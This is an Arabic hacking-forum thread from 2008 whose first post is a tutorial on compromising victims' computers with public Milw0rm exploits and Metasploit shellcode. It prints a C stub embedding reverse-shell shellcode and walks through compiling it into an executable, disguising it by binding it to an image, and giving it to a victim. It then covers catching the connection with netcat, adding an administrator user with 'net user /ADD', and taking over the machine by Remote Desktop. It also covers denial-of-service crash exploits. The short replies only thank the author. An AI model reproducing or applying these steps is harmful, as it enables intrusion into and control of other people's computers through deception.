برنامج رائع ورهيب فى تقطيع الافلام والفيديو SolveigMM Video Splitter 2...  آخر رد: ظريف المصرى    <::>    برنامج فريد وعجيب اضف اى ملف تكست بالبرنامج تحصل على ملف صوتى mp3  آخر رد: abdou o0o    <::>    نسخة ويندوز ستنبهر وتفتخر بها Windows XP Pro SP3 Untouched October 200...  آخر رد: معين 32    <::>    هل انت شخصية تلبس قناع الزيف ؟؟  آخر رد: Audy_23    <::>    عانسة  آخر رد: جنه    <::>    فيلم (( كبارية )) حصرياَ - خش وشوف الجوده  آخر رد: kimo22    <::>    ويندوز اكس بى فيينا 2009 غلى يلاعرب Windows XP SP3 Xp-Viena Edition 20...  آخر رد: معين 32    <::>    حصرية الموسم .. فيلم بنات وموتوسيكلات احدث افلام 2008  آخر رد: kimo22    <::>    •·.·´¯`·.·• (انصحني ولا تفضحني) •·.·´¯`·.·  آخر رد: جنه    <::>    ؛؛؛’’’؛؛؛ نيران صدرى ؛؛؛’’’؛؛؛  آخر رد: جنه    <::>   
 




جــديــد المنتدى
IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image IPB Image


مطلوب مشرفين لجميع الاقسام .... سارع بتقديم طلبك

العودة يلاعرب لكل العرب > عبـــــاقرة يلاعـــــرب > هـاكـرونـى

هـاكـرونـى برامج الهاكروالاختراق و التجسس

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 10-14-2008, 04:11 PM   #1
معلومات العضو
aminos
ذهبــــــى
 
الصورة الرمزية aminos









علم بلدى

aminos غير متصل

أحصائية الترشيح

عدد النقاط : 21
aminos is on a distinguished road

 

افتراضي اخترآق الأجهزة بطرق مختلفـــــــــــــــــ,ـــــــــــــــة


اخترآق الأجهزة بطرق مختلفـــــــــــــــــ,ـــــــــــــــة

.:: [ بســم اللهـ الرحمـن الرحيـم ] ::.


السلآم عليكم يآ شبآب ان شآء اللهـ, بخير , المهم اليوم رآح اشرح شرح مبسط


للثغرآت للي تنزل بالـ Milw0rm + الـ M3tasploit


( مجرد شرح بسيط وتوضيح مب كآمل )


موضوعي اليوم يتحدث عن الثغرات الطفح [ Ov3rFl0w ] و حجب الخدمة [ D0s/P0c ]

وشرح طريقة الاختراق باستخدام الشيل كود [ sh3ll c0de ]

طبعآ يآ شبآب هآي الطرق مآتنفع للاخترآق العشوآئي , بس للاخترآق المستهدف

ولآزم احيانا تحتآج آي بي الشخص المستهدف باي طريقه تجيب الأي بي مب مشكله

وعندك طريقه سحب الأي بي من المسنجر عن طريق سكربت IP G3T


والحين نبدآ بتعريف وتوضيح اهم المصطلحآت وبعدين نفصل كل شيء عشآن مآيصير اي

لخبطه بالموضوع

اول شيء نشوف طريقه تقسيم الثغرآت للي تنزل بالـ Milw0rm


نبدآ




الـ Rem0te

تعتبر من اخطر واقوى انوآع الثغرآت يعني تحكم عن بعد والصرآحة هي من افضل الانوآع واسهلهآ

وهي 0-Day يعني ثغرة مميته وخطيره ويشترط وجود برنآمج بجهآز الضحيه





الـ L0cal

يعني تطبيق محلي ويختلف شوي عن الريموت

بس يظل الريموت اقوى واحسن




الـ d0s/p0c

وهي ثغرات حجب الخدمة (d3nial of s3rvice)

وهو احيانا يكون مجرد تهنيق للجهآز

او يسوي له كرآش [ Cr4sh ]

بشرط يكون البرنآمج منصب ع الجهآز

مثلا لو لقيت كرآش في برنآمج PhoTo Shop ونزلت الملف

رآح يصير التهنيق / الكرآش




الـ Sh3ll c0de

هو كود لبرنآمج ويؤدي لـ / اضافه يوزر / دآونلودر , بآتش / تنفيذ اوآمر الدوس / اتصآل عكسي / اتصآل مبآشر

وحقن ملفآت الـ DLL

وهو يوجد بكل ثغرآت الريموت واللوكل عشآن نقدر نتحكم بالنظآم


وفي اشياء ثانية , بس اكثر الأشياء للي رآح نحتآجهآ هي

B!nd Sh3ll = اتصآل مبآشر

R3v3rse Sh3ll = اتصآل عكسي ( افضل واقوى )

طبعآ يآ شبآب الثغرآت تجي بمختلف لغآت البرمجه وكل ثغرى تكون غير عن ثغرة ثآنية

وطريقه التعرف ع الثغرآت وآضحة جدآ بس رآح نذكرهآ + شرح فيديو لطريقه الترجمه

ومرفقه معهم الادوآت للترجمه

يلا نبدآ

اول شيء الـ pHp ويبدآ كذآ : <?php

والحين هذا هو شرح الفيديو :
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

,

ثآني شيء الـ P3rl ويبدآ كذآ : #!/u sr/bin/P3rl

والحين شرح الترجمه :
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

,

ثآلث شيء الـ C++ \C ويبدآ كذآ : #includ3 "stdio.h"

شرح الفيديو :
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

,

رآبع شيء الـ
ويبدآ كذآ : #!/u sr/bin/env pyth0n

شرح الترجمه :
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

,

خآمس شيء الـ Ruby ويبدآ كذآ : #!/u sr/bi n/ruby

شرح الترجمه :
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]


//

والحين نشرح اهم مصطلحآت للشل كود في موقع الـM3tasploit


اول شيء ندش علىآ هآي الرآبط

الرآبط :/
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

طبعآ انا مختآر نظآم ويندوز بيئة 32 بت

وهاي هو المستخدم الاكثر وتقتدر تختآر لنظآم الـ Linux اذا حبيت تخترق اجهزة بنظآم ليونكس

المهم تآبعوآ


W!nd0ws B!nd DLL I.n.j.e.c.t = يعني حقن ملف ربط دينامكي ( اتصآل مبآشر )

\

W!nd0ws B!nd Sh3ll = شل كود وضيفتهآ الأتصآل المبآشر

/

W!nd0ws E.x.e.c.u.t.a.b.l.e D.o.w.n.l.o.a.d and Ex**ute = شل كود وضيفتهآ تحميل وتنفيذ كود حلو لمحبين برآمج الأخترآق

\

W!nd0ws Ex**ute C.o.m.m.a.n.d = تنفيذ احد اوآمر الدوس , تشغيل الحاسبه او اضافه يوزر للي تبيه بالدوس

/

W!nd0ws Ex**ute net us3r /ADD = اضافه يوزر للنظآم ونقدر نسيطر عليه من الـ Rem0te D.e.s.k.t.o.b

وينفع لاصحآب اخترآق الموآقع اضافه يوزر روت

\

W!nd0ws Rev3rse DLL I.n.j.e.ct = حقن ملف ربط دينامكي ( اتصآل عكسي )

/

W!nd0ws Rev3rse Sh3ll = كود وضيفته الأتصآل العكسي ورآح يكون مستخدم بشكل كبير بالثغرآت لقوته وسيطرته

الكآمله ع النظآم

ورآح يكون الأخترآق عن طريق الـ NeTCaT يعني تسوي تنصت لين يشبك الضحية مع جهآزك

وتتقدر بعد اذا تبي يكون التبليغ ع برنآمج اخترآق

ورآح اشرح كل شيء بفقرة لحآله

//

يلا نبدآ اول شيء بالـ Rem0te


طبعآ يختلف نوع الثغرة في ثغرآت تكون بصيغه HTML ولآزم الشل كود يكون مشفر بلغه الجآفآ

اما اذا كآنت الثغرة مكتوبه بالسي عآدي نترجم علاطووووول

نختآر اي ثغرة مثلا آخر وحده نزلت :
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

طبعآ الشل كود يكون جآهز واذا مآعجبك نوع الشل كود تقدر تغيره بشرط الشل كود مآيكون كبير عن للي موجود

بالثغرة ولو كآن اصغر منه عآدي مآفي مشآكل

نبدآ نشرح تفاصيل الثغرة




يعني الثغرة بلغه الـ C





وهني يقولك الشل كود وظيفته الأتصآل المبآشر B!nd Sh3ll


ويفتح بورت في الجهآز 9998

وحجم الشل كود 317 بآيت يعني اذا حبيت تغير الشل كود لآزم تجيب وآحد نفس الحجم او اصغر منه




هني يقولك حجم الفيض بالذآكرة 10000 بآيت لاتغيره لانه حجم الثغرة كبير شوي


والحين خلصنآ للي عليك تترجم الثغرة وتطبق الثغرة اذا كنت منصب البرنآمج ورآح تشتغل معآك الثغرة زين

#########################################

الحين نروح لثغرة ثآنية وهي ثغرة ببرنآمج Xchat

وهآي الثغرة لازم تكون صيغتهآ HTML

ولآزم الشل كود يكون مشفر بلغه الجآفآ

نشرح التفاصيل





يعني يقولك بالملاحظة لازم الشل كود ينفذ آمر تشغيل الالحاسبه

ونبدآ ننسخ الثغرة من HTML وتحت ورآح نحصل مكتةب بنص الثغرة


c.o.m.m.a.n.d "Sh3ll c.a.l.c"


يعني نسوي شل كود ينفذ آمر تشغيل الاحاسبه


ندخل ع الموقع الميتآ :
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

ونختآر



يعني تنفيذ اوآمر الدوس

ويوم تضغط ع الرآبط رآح يجيك كذآ



في المربع الاول كتب آمر الدوس وهو تشغيل الالحاسبه

والامر الثاني خله زي مآهو لاتغيره

وآخر شيء اضغط تكوين



وبعد مآنضغط تكوين رآح يطلع لنآ الشل كود لتشغيل الالحاسبه




الحين كل شيء وآضح ننسخ الشل كود ونحطه بالثغرة .. بس قبل كل شيء

احنآ قلنآ الثغرة مكتوبه بالـ HTML

يعني مآينفع نحط شل كود مكتوب بالسي ولآزم نحول الشل كود من السي الى الجآفآ عن طريق هآي الأدآة

المكتوبه بالبيرل ( من طرح الأخ العزيز بروتو مآن )



لآحظ معآي الادآة يوم فتحته بالمفكرة

موجود دآخلهآ شل كود ولآزم نستبدل الشل كود الموجود بالادآة للي كونآه قبل شوي

الحين ننسخ الشل كود للي سوينآه ونحطه بالادآه عشآن يحول لنآ الي لغه الجآفآ عشآن المتصفح يقدر يشغله

هذآ هو ننسخه



ونحطه بالادآة

وبعد مآحطينآه نحفظ الشغل كله ونحط الادآة بالسي ونترجمهآ



على مأظن كل شيء وضح الحين شغلنآ الأدآة وشفر لنآ الشل كود الى الجآفآ والحين نحط هآي الكود

بالثغرة ونجرب نشغله ورآح يشتغل باذن الله

واما الأدآة للي تحول الشل كود للجآفآ حملهآ من هآي الرآبط

الرآبط :/
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

#######################################

الحين خلصنآ من ثغرآت الريموت وتكون اغلبهآ زي كذآ

واللولكل تقريبا زي الريموت ويختلف في شويه اشياء والفرق مب كبير


والحين ثغرآت حجب الخدمه الـ D0s/P0c

وهي ثغرآت مآتخليك تخترق الجهآز يعني زي مآوضحنآ قبل مجرد تهنيق او كرآش


للجهآز ومآيكون بصيغه exe

مثال هآي الثغرة

[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

الكرآش في برنآمج uTorrent

وهي مكتوبه بلغه البيرل ننسخهآ في المفكرة ونحول الصيغه الي .pl

وونقل الملف للـ c

ونترجمه ورآح يطلع لنآ زي كذآ



نكتب الأي بي وبعدين البورت وبعدين اليوزر + البآس

ورآح تشتغل وفي اكثر من طريقه

في ثغرآت بمجرد انك تعطي ملف للضحية يبدآ جهآزه يعلق ويصير له بطأ شديد


#######################################

الحين ننتقل لاحسن شيء بالموضوع الـ Sh3ll c0de


ورآح اذكر كيف تخترق بدون ثغرآت يعني بس تحتآج لشل كود خآص فيك واخترق


ولا رآح نستخدم لا ثغرى ريموت ولآ شيء

الحين روح للميتآ كالعاده كآنك تسوي شل كود والحين اختآر

Rev3rse Sh3ll = اتصآل عكسي



ورآح يجيك زي كذآ تآبع



في المربع الأول اكتب آي بي جهآزك

واكتب المنفذ المفتوح عندك والحين

اضغط على تكوين



وبعد مآتضغط على تكوين انسخ الشل كود



وحطه بين هآي الكود

كود:
#includ3 <stdio.h>char ****lcode[]="\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\ x5b \x81\x73\x13\xf3""\x75\x47\x94\x83\xeb\xfc\xe2\xf4 \x0f\x9d\x03\x94\xf3\x75\xcc\xd1""\xcf\xfe\x3b\x91 \x8b\x74\xa8\x1f\xbc\x**\xcc\xcb\xd3\x74\xac\xdd"" \x78\x41\xcc\x95\x1d\x44\x87\x0d\x5f\xf1\x87\xe0\x f4\xb4\x8d\x99""\xf2\xb7\xac\x60\xc8\x21\x63\x90\x 86\x90\xcc\xcb\xd7\x74\xac\xf2""\x78\x79\x0c\x1f\x ac\x69\x46\x7f\x78\x69\xcc\x95\x18\xfc\x1b\xb0""\x f7\xb6\x76\x54\x97\xfe\x07\xa4\x76\xb5\x3f\x98\x78 \x35\x4b\x1f""\x83\x69\xea\x1f\x9b\x7d\xac\x9d\x78 \xf5\xf7\x94\xf3\x75\xcc\xfc""\xcf\x2a\x76\x62\x93 \x23\xce\x6c\x70\xb5\x**\xc4\x9b\x85\xcd\x90""\xac \x1d\xdf\x6a\x79\x7b\x10\x6b\x14\x16\x26\xf8\x90\x 5b\x22\xec""\x96\x75\x47\x94";main(){void (*routine) ();(long) routine = &****lcode;routine();}


بدل الشل كود للي موجود بالادآة بالشل كود للي سوينآه الحين

وبعدين احفظ الملف بآمتدآد .c

والحين ننترجم الادآة , وانا نزلت درس كيف نترجم الثغرآت الادوآت

بعد الترجمه رآح يكون الأمتدآد exe

عطه الملف اي وآحد وسوي تنصت للنت كت

ع البورت للي حطيته يوم سويت الشل كود وانا اخترت بورت 3460

للي هو بورت البيوزن مب مهم انت اختآر اي بورت ينآسبك

تآبع



نسوي تنصت نفس مآقلنآ ع البورت للي حددنآه عن طريق هآي الأمر

كود PHP:
-v -l -
p




ونتكب بعد الـ p

البورت

وبعد مآشغلت الشل كود المترجم

اتصل مع جهآزي ورآح يكون كذآ



والحين نفذ اوآمر الدوس على رآحتك وتقتدر تضيف يوزر او تغير بآس الأدمن عشآن نتحكم يجهآز الضحية

عن طريق الـ Rem0te D3sktop

وللي مآفهم الشرح الشل كود يحمل الشرح فيديو من هآي الرآبط

الرآبط :/
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

واما ادآة النت كت معظمكم عنده وهو موجود مع برنآمج الـميتآ سبلويت

#############################################

والحين ننتقل لخيآر W!nd0ws Ex**ute net us3r /ADD

ويعني اضافه يوزر للنظآم وحتى اصحآب اخترآق الموآقع يقدرون بستفيدون منهآ

المهم



والحين بعد مآتضغط سوي زي مآهو موضح



في المربع الأول البآس ورد لليوزر

والثآني اسم اليوزر


وحطه بالادآة للي حطيانه للاتصآل العكسي وترجم الثغرة

وبعدين عطه لاي وآحد

واذا الضحية شغل الملف رآح ينضآف يوزر جديد للجهآز ونقدر نستفيد عن طريق التحكم عن بعد

Rem0te D3sktop

نحط آي بي ضحيتنآ وبعدين نتكب اليوزر للي انضآف للنظآم وبعدين البآس

ورآح يدش معآك وتمتع تحكم كآمل للضحية

شرح الفيديو من هآي الرآبط

الرآبط : /
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

او : [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

في الأخير عشآن شاشه الدوس مآتطلع لك

ادمج الملف مع برنآمج صورة اي شيء تبيه او اضغط الملف باي اداه ضغط

وان شآء الله تختفي الشاشه

يلآ شبآب اذا في خطآ بلغوني والانسآن مب معصوم عن الخطأ واذا في شيء مب وآضح قلولي عليه

وكل الشكر لاخوي العرآب علىآ مسآعدته ليــــ, < المود سيكيروتي جننـــ,ــــه

وانا نقلت الموضوع لاغلب المنتديآت للي مسجل فيهآ عشآن الفايده وانه كل منتدى زواره يختلف







التوقيع


    رد مع اقتباس
قديم 10-14-2008, 04:57 PM   #2
معلومات العضو
lover123
صقـــر الأســـلام
 
الصورة الرمزية lover123









علم بلدى

lover123 غير متصل

أحصائية الترشيح

عدد النقاط : 99
lover123 will become famous soon enough

 

افتراضي


شكرا علي روائعك الجميلة ومثبت







التوقيع






    رد مع اقتباس
قديم 11-17-2008, 07:38 PM   #3
معلومات العضو
moon man
أعضاء مسجلين
عضو مبتدئ









علم بلدى

moon man غير متصل

أحصائية الترشيح

عدد النقاط : 10
moon man is on a distinguished road

 

افتراضي


شكراً لك على هذا الشرح الوافي









    رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدلالية (Tags)
مختلفـــــــــــــــــ, المدهشة, اخترآق, بطرق, ـــــــــــــــة



الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع


 

الساعة الآن 05:13 AM.
Powered by vBulletin® Version 3.7.1, Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.2.0 ©2008, Crawlability, Inc.
جميع الحقوق محفوظة لشبكة يلاعرب وجميع المواضيع المكتوبه لا تعبر بالضروره عن وجهة نظر الموقع وإنما عن وجهة نظر الاعضاء



1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141